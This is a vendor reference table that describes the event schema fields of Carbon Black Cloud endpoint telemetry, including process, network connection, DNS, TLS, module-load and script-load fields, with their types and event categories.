`crossproc_api`	Name of the operating system API called by the actor process. In cases where that call targets another process, that process is reported as crossproc_name. In cases where there is no target process, this field represents a system API call. Available with: all sensors with Endpoint Standard Windows 3.8 or later sensor with Enterprise EDR macOS sensors with Enterprise EDR (only reporting the PEP_CREATE_PHANDLE_API call made in task_for_pid() requests)	String		`CROSSPROC`
`crossproc_guid`	Unique ID of the cross process	String	NOT FILTERABLE	`CROSSPROC`
`crossproc_hash`	Cryptographic hashes of the target of the crossproc event — this is represented as an array of two elements, MD5 and SHA-256 hash	String[]		`CROSSPROC`
`crossproc_name`	Full path to the target of the crossproc event on the device’s local file system	String		`CROSSPROC`
1.2.0 `crossproc_pid`	Process identifier assigned by the operating system to one of the cross-process members; if crossproc_target=true, it is the PID of the process targeted in the cross-process action; if crossproc_target=false, it is the PID of the actor process	Integer		`CROSSPROC`
`crossproc_publisher[].name`	Array with objects of two keys: “name” and “state”. Each array entry is a signature entry for the crossproc as reported by the endpoint	String	Filterable field: `crossproc_publisher`	`CROSSPROC`
`crossproc_publisher[].state`	See above	String	Filterable field: `crossproc_publisher_state`	`CROSSPROC`
`crossproc_reputation`	Carbon Black Cloud Reputation string for the crossproc.	String		`CROSSPROC`
`crossproc_target`	True if the process was the target of the cross-process event	Boolean		`CROSSPROC`
`device_external_ip`	IP address of the host as seen by the backend (the public IPv4 or IPv6 address used to contact the Carbon Black Cloud)	String	ENDPOINT STANDARD	`COMMON`
`device_group`	Sensor group to which the endpoint was assigned when the sensor recorded the event data	String		`COMMON`
`device_id`	Integer ID of the device that created this event	String		`COMMON`
1.2.0 `device_internal_ip`	IP address of the host as seen by the sensor (the internal IPv4 or IPv6 address used by the sensor to the Carbon Black Cloud)	String	ENDPOINT STANDARD	`COMMON`
`device_name`	Hostname of the device that created this event	String		`COMMON`
`device_os`	OS Type of device (Windows/OSX/Linux)	String		`COMMON`
`device_timestamp`	Time seen on sensor, based on sensor’s clock in RFC 3339 UTC format to seconds Example: `2021-07-28 18:43:51 +0000 UTC`	ISO 8601 UTC timestamp	NOT FILTERABLE	`COMMON`
`event_description`	Long textual description of the event as seen in the Carbon Black Cloud web console	String	ENDPOINT STANDARD
`event_id`	Internal Endpoint Standard event ID associated with this specific event — this event ID can be used to find the specific event in the Carbon Black Cloud web console	String	NOT FILTERABLE ENDPOINT STANDARD	`COMMON`
`event_origin`	Indicates which product the event came from. “EDR” indicates the event originated from Enterprise EDR. “NGAV” indicates the event originated from Endpoint Standard.	String		`COMMON`
`fileless_scriptload_cmdline`	Deobfuscated script content run in a fileless context by the process	String	TOKENIZED	`FILELESS SCRIPTLOAD`
`fileless_scriptload_cmdline_length`	Character count of the deobfuscated script content run in a fileless context	Integer		`FILELESS SCRIPTLOAD`
`fileless_scriptload_hash`	SHA-256 hash(es) of the deobfuscated script content run by the process in a fileless context	String		`FILELESS SCRIPTLOAD`
`filemod_hash`	Cryptographic hashes of the file modified — this is represented as an array of two elements, MD5 and SHA-256 hash	String[]		`FILEMOD`
`filemod_name`	Full path to the file being modified on the device’s file system	String		`FILEMOD`
1.2.0 `filemod_new_name`	Full path to the file being modified during “ACTION_FILE_RENAME” on the device’s file system	String		`FILEMOD`
`local_ip`	IPv4 or IPv6 address in string format associated with the “local” end of this network connection	String		`NETCONN`
`local_port`	UDP/TCP port number associated with the “local” end of this network connection	Integer		`NETCONN`
`modload_count`	Count of modload events reported by the sensor since last initialization	Integer		`MODULE LOAD`
`modload_effective_reputation`	Effective reputation(s) of the loaded module(s); applied by the sensor when the event occurred	String		`MODULE LOAD`
`modload_hash`	MD5 or SHA-256 hash(es) of the module(s) loaded by the process	String[]		`MODULE LOAD`
`modload_md5`	MD5 hash of the module loaded by the process	String		`MODULE LOAD`
`modload_name`	Full path to the module being loaded on the device’s file system	String		`MODULE LOAD`
`modload_publisher[].name`	Array with objects of two keys: “name” and “state”. Each array entry is a signature entry for the moduleload as reported by the endpoint	String	Filterable field: `modload_publisher`	`MODULE LOAD`
`modload_publisher[].state`	See above	String	Filterable field: `modload_publisher_state`	`MODULE LOAD`
`modload_sha256`	SHA-256 hash of the module loaded by the process	String		`MODULE LOAD`
`netconn_application_protocol`	Protocol detected in the application layer of the network session; does not always match port listed in IANA service registry	String	TOKENIZED XDR	`NETCONN`
`netconn_bytes_received`	Final byte count for all transport-layer payload received by the sensor’s endpoint during the session	Integer	TOKENIZED XDR	`NETCONN`
`netconn_bytes_sent`	Final byte count for all transport-layer payload sent by the sensor’s endpoint during the session	Integer	TOKENIZED XDR	`NETCONN`
`netconn_community_id`	Community ID of the network session, calculated by this convention: https://github.com/corelight/community-id-spec	String	TOKENIZED XDR	`NETCONN`
1.2.0 `netconn_dns_answer_class`	The set of resource class in the query answer (aka answer_class).	String[]		`NETCONN`
1.2.0 `netconn_dns_answer_count`	The total number of resource records in a reply message’s answer section.	Integer		`NETCONN`
1.2.0 `netconn_dns_answer_data`	The set of data in the query answer.	String[]		`NETCONN`
1.2.0 `netconn_dns_answer_data_length`	The length of the data in a reply message’s answer section.	Integer[]		`NETCONN`
1.2.0 `netconn_dns_answer_name`	The set of resource descriptions in the query answer (aka answer_name).	String[]		`NETCONN`
1.2.0 `netconn_dns_answer_ttl`	The set of resource ttl in the query answer.	Integer[]		`NETCONN`
1.2.0 `netconn_dns_answer_type`	The set of resource type in the query answer.	String[]		`NETCONN`
1.2.0 `netconn_dns_flags`	Set of DNS flags	String[]		`NETCONN`
1.2.0 `netconn_dns_query_class`	A descriptive name for the class of the query.	String		`NETCONN`
1.2.0 `netconn_dns_query_name`	The domain name that is the subject of the DNS query.	String		`NETCONN`
1.2.0 `netconn_dns_query_type`	A descriptive name for the type of the query.	String		`NETCONN`
1.2.0 `netconn_dns_response_code`	DNS response codes as defined under RFC 1035, RFC 2136 and RFC 8914.	Integer		`NETCONN`
`netconn_domain`	DNS name associated with the “remote” end of this network connection — may be empty if the name cannot be inferred or the connection is made direct to/from a remote IP address	String		`NETCONN`
`netconn_first_packet_timestamp`	Timestamp when the sensor detected the first packet in the network session	ISO 8601 UTC timestamp	NOT FILTERABLE XDR	`NETCONN`
`netconn_inbound`	Set to true if the netconn is inbound	Boolean		`NETCONN`
`netconn_ja3_local_fingerprint`	JA3 hash of the client side of the TLS session; JA3 if client-intiated, JA3s if server-initiated	String	TOKENIZED XDR	`NETCONN`
`netconn_ja3_local_fingerprint_fields`	Values used to calculate the JA3 hash for the local side of the TLS session	String	TOKENIZED XDR	`NETCONN`
`netconn_ja3_remote_fingerprint`	JA3 hash of the remote side of the TLS session; JA3 if client-intiated, JA3s if server-initiated	String	TOKENIZED XDR	`NETCONN`
`netconn_ja3_remote_fingerprint_fields`	Values used to calculate the JA3 hash for the remote side of the TLS session	String	TOKENIZED XDR	`NETCONN`
`netconn_last_packet_timestamp`	Timestamp when the sensor detected the last packet in the network session	ISO 8601 UTC timestamp	NOT FILTERABLE XDR	`NETCONN`
`netconn_protocol`	String UDP or TCP protocol identifier	String		`NETCONN`
`netconn_proxy_domain`	DNS name associated with the “proxy” end of this network connection — may be empty if the name cannot be inferred or the connection is made direct to/from a proxy IP address	String		`NETCONN PROXY`
`netconn_proxy_ip`	IPv4 or IPv6 address in string format associated with the “proxy” end of this network connection	String		`NETCONN PROXY`
`netconn_proxy_port`	UDP/TCP port number associated with the “proxy” end of this network connection	Integer		`NETCONN PROXY`
`netconn_remote_device_id`	Carbon Black device ID (if sensor installed) of the remote side of the session	Integer	TOKENIZED XDR	`NETCONN`
`netconn_remote_device_name`	Carbon Black device name (if sensor installed) of the remote side of the session	String	TOKENIZED XDR	`NETCONN`
`netconn_request_headers`	HTTP request headers captured from start of HTTP session; represented as key:value pairs	String[]	TOKENIZED XDR	`NETCONN`
`netconn_request_method`	HTTP session request method	String	TOKENIZED XDR	`NETCONN`
`netconn_request_url`	URL requested for the HTTP session	String	TOKENIZED XDR	`NETCONN`
`netconn_response_headers`	HTTP response headers captured at start of HTTP session; represented as key:value pairs	String[]	TOKENIZED XDR	`NETCONN`
`netconn_response_status_code`	Status of requested HTTP operation	Integer	TOKENIZED XDR	`NETCONN`
`netconn_server_name_indication`	Hostname requested by TLS client to help server determine which certificate to use when multiple TLS-protected services are listening on the same IP:port binding	String	TOKENIZED XDR	`NETCONN`
`netconn_tls_certificate_issuer_name`	Certification authority that issued the X.509 certificate	String	TOKENIZED XDR	`NETCONN`
`netconn_tls_certificate_subject_name`	Subject that was issued the X.509 certificate	String	TOKENIZED XDR	`NETCONN`
`netconn_tls_certificate_subject_not_valid_after`	Timestamp when certificate expires	ISO 8601 UTC timestamp	NOT FILTERABLE XDR	`NETCONN`
`netconn_tls_certificate_subject_not_valid_before`	Timestamp when certificate becomes valid	ISO 8601 UTC timestamp	NOT FILTERABLE XDR	`NETCONN`
`netconn_tls_cipher`	Set of cryptographic algorithms used to secure the TLS connection	String	TOKENIZED XDR	`NETCONN`
`netconn_tls_version`	TLS protocol version used in this session	String	TOKENIZED XDR	`NETCONN`
`org_key`	The organization key associated with the console instance. Can be used to disambiguate events from different Carbon Black Cloud tenant organizations.	String		`COMMON`
`parent_cmdline`	Process command line associated with the parent process	String	TOKENIZED	`COMMON`
`parent_guid`	Unique ID of parent process. Please see this document for more information on how a process GUID is used and each of its components.	String	NOT FILTERABLE	`COMMON`
`parent_hash`	Cryptographic hashes of the executable file backing the parent process, represented as an array of two elements - MD5 and SHA-256 hash	String[]		`COMMON`
`parent_path`	Full path to the executable file backing the parent process on the device’s file system	String		`COMMON`
`parent_pid`	OS-reported Process ID of the parent process	Integer		`COMMON`
`parent_reputation`	Reputation of the parent process	String		`COMMON`
`process_cmdline`	Command line executed by the actor process	String	TOKENIZED	`COMMON`
`process_duration`	The time difference in seconds between the process start and process terminate event	Integer	NOT FILTERABLE	`COMMON`
`process_fork_pid`	The PID of a process forked from the actor on *nix systems. If f process_pid != process_fork_pid, the current process was forked from original process_pid.	Integer		`COMMON`
`process_guid`	Unique ID of process. Please see this document for more information on how a process GUID is used and each of its components.	String	NOT FILTERABLE	`COMMON`
`process_hash`	Cryptographic hashes of the executable file backing this process, represented as an array of two elements - MD5 and SHA-256 hash	String[]		`COMMON`
1.2.0 `process_integrity_level`	Windows Mandatory Integrity Control (MIC) level of the process.	Integer		`COMMON`
`process_loaded_script_hash` DEPRECATED	SHA-256 hash(es) of any script loaded from the filesystem through the duration of the process	String[]	ENDPOINT STANDARD XDR	`SCRIPTLOAD`
`process_loaded_script_name` DEPRECATED	Filesystem path(s) of any script content loaded from the filesystem through the duration of the process	String	ENDPOINT STANDARD XDR	`SCRIPTLOAD`
`process_path`	Full path to the executable file backing this process on the device’s file system	String		`COMMON`
`process_pid`	OS-reported Process ID of the current process	Integer		`COMMON`
1.2.0 `process_privileges`	Windows privileges associated wth the process (see Microsoft documentation for complete list privilege-constants).	String[]		`COMMON`
`process_publisher[].name`	Array with objects of two keys: “name” and “state”. Each array entry is a signature entry for the process as reported by the endpoint	String	Filterable field: `process_publisher`	`COMMON`
`process_publisher[].state`	See above	String	Filterable field: `process_publisher_state`	`COMMON`
`process_reputation`	Reputation of the actor process	String		`COMMON`
`process_terminated`	True if process was terminated	Boolean	NOT FILTERABLE	`COMMON`
1.2.0 `process_user_id`	The user ID (SID) under which the actor process was executed.	String		`COMMON`
`process_username`	The username associated with the user context that this process was started under	String		`COMMON`
`regmod_name`	Full path to the registry key, including the hive, being modified on the Windows device’s registry	String		`REGMOD`
`remote_ip`	IPv4 or IPv6 address in string format associated with the “remote” end of this network connection	String		`NETCONN`
`remote_port`	UDP/TCP port number associated with the “remote” end of this network connection	Integer		`NETCONN`
`schema`	The schema version. The current schema version is “1.1.0”. This schema version will only be incremented if the field definitions are changed in a backwards-incompatible way. New fields in an event type or new event types will not result in a new schema version.	Integer		`COMMON`
`scriptload_content`	Deobfuscated script content (string, binary, or raw executable image) loaded from the filesystem at process launch	String	ENDPOINT STANDARD	`SCRIPTLOAD`
`scriptload_content_length`	Character count of the deobfuscated filesystem script	Integer	ENDPOINT STANDARD	`SCRIPTLOAD`
`scriptload_count`	Count of scriptload events across all processes reported by the sensor since last initialization	Integer	ENDPOINT STANDARD	`SCRIPTLOAD`
`scriptload_effective_reputation`	Effective reputation(s) of the loaded script(s)	String	ENDPOINT STANDARD	`SCRIPTLOAD`
`scriptload_hash`	MD5 and/or SHA-256 hash(es) of the filesystem script file loaded at process launch	String	ENTERPRISE EDR	`SCRIPTLOAD`
`scriptload_name`	Filesystem path of script file(s) loaded at process launch	String	ENTERPRISE EDR XDR	`SCRIPTLOAD`
`scriptload_publisher[].name`	Array with objects of two keys: “name” and “state”. Each array entry is a signature entry for the scriptload as reported by the endpoint	String	ENTERPRISE EDR Filterable field: `scriptload_publisher`	`SCRIPTLOAD`
`scriptload_publisher[].state`	See above	String	ENTERPRISE EDR Filterable field: `scriptload_publisher_state`	`SCRIPTLOAD`
`scriptload_reputation`	Reputation(s) of the loaded script(s)	String	ENTERPRISE EDR	`SCRIPTLOAD`
`sensor_action`	(optional) Included if the sensor blocked the event or terminated the application due to security policy `POLICY_NOT_APPLIED`, `ALLOW`, `ALLOW_AND_LOG`, `TERMINATE`, `DENY`	String	XDR	`COMMON`
`target_cmdline`	Process command line associated with the target process	String	TOKENIZED	`COMMON`
`type`	The event type. Use this field to determine which fields should be expected per the Event Type column of this table.	String		`COMMON`
`version`	The schema version. The current schema version is “1.1.0”. This schema version will only be incremented if the field definitions are changed in a backwards-incompatible way. New fields in an event type or new event types will not result in a new schema version.	String		`COMMON`

Last modified on May 16, 2025

Carbon Black Cloud

Page Contents